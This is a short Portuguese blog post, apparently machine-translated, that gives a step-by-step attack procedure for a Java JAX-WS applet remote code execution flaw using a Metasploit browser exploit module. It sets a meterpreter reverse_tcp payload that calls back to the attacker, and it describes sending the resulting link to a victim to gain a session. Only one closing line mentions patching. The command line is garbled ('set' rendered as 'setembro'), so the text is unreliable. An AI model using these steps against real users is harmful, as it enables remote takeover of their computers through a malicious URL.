Publicou recentemente uma nova vulnerabilidade no Java, chamada Java JAX-WS Applet Execução Remota de Código descoberto por @ _juan_vazquez_ que afeta a versão 1.7.0_07-b10 e anteriores.
A exploração respectivo para explorar esta vulnerabilidade é respectivamente nos módulos Metasploit e pode ser utilizado para executar tal msfupdate só.
O módulo está disponível no Metasploit para essa vulnerabilidade aproveita JAX-WS classes de um Applet Java para executar o código Java arbitrária.
Os procedimentos e requisitos de explorar esta vulnerabilidade é muito simples, apenas o suficiente para ter BackTrack e um sistema virtual para testes.
REQUISITOS :
Backtrack 5 R1 - R2 ou R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (vítima)
Google Chorme, Firefox ou IE (vítima) PROCEDIMENTO DE ATAQUE : Metasploit Aberto (msfconsole) e executar o seguinte exploit/multi/browser/java_jre17_jaxws PAYLOAD setembro windows / Meterpreter / reverse_tcp 192.168.1.19 SRVHOST setembro setembro TARGET 1 setembro lhost
Como é do conhecimento comum e prática, estes comandos criar uma URL que será enviado para o usuário a executá-lo a partir de qualquer navegador web, ou Google Chorme, Firefox, Internet Explorer ou Opera contendo a versão vulnerável do Java 1.7.0_07- b10 e anteriores.
Então, se o usuário consegue executar o URL gerado em qualquer sistema operacional ou navegador, teremos uma sessão metepreter como mostrado na imagem a seguir:
Portanto, apenas os comandos respectivos iria executar operação e pós-operação para tirar proveito do sistema, vulneráveis a uma URL simples com este novo exploit frescos do forno.
Vídeo tutorial :
Para evitar ser vítima deste ataque, você deve atualizar para a versão mais recente do Java disponível, que pode ser baixado clicando aqui . Enjoy? (:
0 comentários:
Postar um comentário